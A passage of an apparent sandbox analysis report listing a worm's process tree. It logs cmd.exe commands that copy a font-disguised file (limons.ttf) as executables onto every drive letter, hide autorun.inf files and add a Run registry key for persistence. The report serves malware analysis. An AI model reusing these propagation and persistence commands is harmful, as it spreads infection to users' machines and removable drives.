    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\System.exe /y
    3⤵
    PID:788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\System.exe /y
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\System.exe /y
    3⤵
    PID:560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\System.exe /y
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\System.exe /y
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\System.exe /y
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\System.exe /y
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\System.exe /y
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\System.exe /y
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\System.exe /y
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\System.exe /y
    3⤵
    PID:316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\System.exe /y
    3⤵
    PID:1216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\System.exe /y
    3⤵
    PID:764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\System.exe /y
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\System.exe /y
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\System.exe /y
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\System.exe /y
    3⤵
    PID:896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\System.exe /y
    3⤵
    PID:888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\System.exe /y
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\System.exe /y
    3⤵
    PID:1848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\vaillo.exe /y
    3⤵
    PID:2732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\vaillo.exe /y
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\vaillo.exe /y
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\vaillo.exe /y
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\vaillo.exe /y
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\vaillo.exe /y
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\vaillo.exe /y
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\vaillo.exe /y
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\vaillo.exe /y
    3⤵
    PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\vaillo.exe /y
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\vaillo.exe /y
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\vaillo.exe /y
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\vaillo.exe /y
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\vaillo.exe /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\vaillo.exe /y
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\vaillo.exe /y
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\vaillo.exe /y
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\vaillo.exe /y
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\vaillo.exe /y
    3⤵
    PID:2288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\vaillo.exe /y
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\vaillo.exe /y
    3⤵
    PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\vaillo.exe /y
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\vaillo.exe /y
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\vaillo.exe /y
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Sounds.exe /y
    3⤵
    PID:2764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Sounds.exe /y
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Sounds.exe /y
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Sounds.exe /y
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Sounds.exe /y
    3⤵
    PID:2608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Sounds.exe /y
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Sounds.exe /y
    3⤵
    PID:2664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Sounds.exe /y
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Sounds.exe /y
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Sounds.exe /y
    3⤵
    PID:3044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Sounds.exe /y
    3⤵
    PID:804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Sounds.exe /y
    3⤵
    PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Sounds.exe /y
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Sounds.exe /y
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Sounds.exe /y
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Sounds.exe /y
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Sounds.exe /y
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Sounds.exe /y
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Sounds.exe /y
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Sounds.exe /y
    3⤵
    PID:2912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Sounds.exe /y
    3⤵
    PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Sounds.exe /y
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Sounds.exe /y
    3⤵
    PID:2948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Sounds.exe /y
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul copy C:\Windows\Fonts\limons.ttf c:\Images.exe /y
    3⤵
    PID:748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul copy C:\Windows\Fonts\limons.ttf d:\Images.exe /y
    3⤵
    PID:2264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul copy C:\Windows\Fonts\limons.ttf e:\Images.exe /y
    3⤵
    PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul copy C:\Windows\Fonts\limons.ttf f:\Images.exe /y
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul copy C:\Windows\Fonts\limons.ttf g:\Images.exe /y
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul copy C:\Windows\Fonts\limons.ttf h:\Images.exe /y
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul copy C:\Windows\Fonts\limons.ttf i:\Images.exe /y
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul copy C:\Windows\Fonts\limons.ttf j:\Images.exe /y
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul copy C:\Windows\Fonts\limons.ttf k:\Images.exe /y
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul copy C:\Windows\Fonts\limons.ttf l:\Images.exe /y
    3⤵
    PID:852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul copy C:\Windows\Fonts\limons.ttf m:\Images.exe /y
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul copy C:\Windows\Fonts\limons.ttf n:\Images.exe /y
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul copy C:\Windows\Fonts\limons.ttf o:\Images.exe /y
    3⤵
    PID:328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul copy C:\Windows\Fonts\limons.ttf p:\Images.exe /y
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul copy C:\Windows\Fonts\limons.ttf q:\Images.exe /y
    3⤵
    PID:912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul copy C:\Windows\Fonts\limons.ttf r:\Images.exe /y
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul copy C:\Windows\Fonts\limons.ttf s:\Images.exe /y
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul copy C:\Windows\Fonts\limons.ttf t:\Images.exe /y
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul copy C:\Windows\Fonts\limons.ttf u:\Images.exe /y
    3⤵
    PID:884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul copy C:\Windows\Fonts\limons.ttf v:\Images.exe /y
    3⤵
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul copy C:\Windows\Fonts\limons.ttf w:\Images.exe /y
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul copy C:\Windows\Fonts\limons.ttf x:\Images.exe /y
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul copy C:\Windows\Fonts\limons.ttf y:\Images.exe /y
    3⤵
    PID:332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul copy C:\Windows\Fonts\limons.ttf z:\Images.exe /y
    3⤵
    PID:992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul attrib +r +h +s c:\autorun.inf
    3⤵
    PID:2008
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s c:\autorun.inf
      4⤵
      Sets file to hidden
      Drops autorun.inf file
      Views/modifies file attributes
      PID:2416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul attrib +r +h +s d:\autorun.inf
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul attrib +r +h +s e:\autorun.inf
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul attrib +r +h +s f:\autorun.inf
    3⤵
    PID:2216
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +h +s f:\autorun.inf
      4⤵
      Sets file to hidden
      Drops autorun.inf file
      Views/modifies file attributes
      PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul attrib +r +h +s g:\autorun.inf
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul attrib +r +h +s h:\autorun.inf
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul attrib +r +h +s i:\autorun.inf
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul attrib +r +h +s j:\autorun.inf
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul attrib +r +h +s k:\autorun.inf
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul attrib +r +h +s l:\autorun.inf
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul attrib +r +h +s m:\autorun.inf
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul attrib +r +h +s n:\autorun.inf
    3⤵
    PID:2520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul attrib +r +h +s o:\autorun.inf
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul attrib +r +h +s p:\autorun.inf
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul attrib +r +h +s q:\autorun.inf
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul attrib +r +h +s r:\autorun.inf
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul attrib +r +h +s s:\autorun.inf
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul attrib +r +h +s t:\autorun.inf
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul attrib +r +h +s u:\autorun.inf
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul attrib +r +h +s v:\autorun.inf
    3⤵
    PID:448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul attrib +r +h +s w:\autorun.inf
    3⤵
    PID:276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul attrib +r +h +s x:\autorun.inf
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul attrib +r +h +s y:\autorun.inf
    3⤵
    PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul attrib +r +h +s z:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2508
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mt /t REG_SZ /d C:\Windows\system32\vaillo.exe /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Sounds
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Sounds
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Sounds
    3⤵
    PID:696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Sounds
    3⤵
    PID:1200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Sounds
    3⤵
    PID:964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Sounds
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Sounds
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Sounds
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Sounds
    3⤵
    PID:2548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Sounds
    3⤵
    PID:2556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Sounds
    3⤵
    PID:112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Sounds
    3⤵
    PID:904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Sounds
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Sounds
    3⤵
    PID:860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Sounds
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Sounds
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Sounds
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Sounds
    3⤵
    PID:1124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Sounds
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Sounds
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Sounds
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Sounds
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Sounds
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist z:\nul md z:\Sounds
    3⤵
    PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist c:\nul md c:\Video
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist d:\nul md d:\Video
    3⤵
    PID:1652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist e:\nul md e:\Video
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist f:\nul md f:\Video
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist g:\nul md g:\Video
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist h:\nul md h:\Video
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist i:\nul md i:\Video
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist j:\nul md j:\Video
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist k:\nul md k:\Video
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist l:\nul md l:\Video
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist m:\nul md m:\Video
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist n:\nul md n:\Video
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist o:\nul md o:\Video
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist p:\nul md p:\Video
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist q:\nul md q:\Video
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist r:\nul md r:\Video
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist s:\nul md s:\Video
    3⤵
    PID:996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist t:\nul md t:\Video
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist u:\nul md u:\Video
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist v:\nul md v:\Video
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist w:\nul md w:\Video
    3⤵
    PID:788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist x:\nul md x:\Video
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe nul /f /c if exist y:\nul md y:\Video
    3⤵
    PID:560
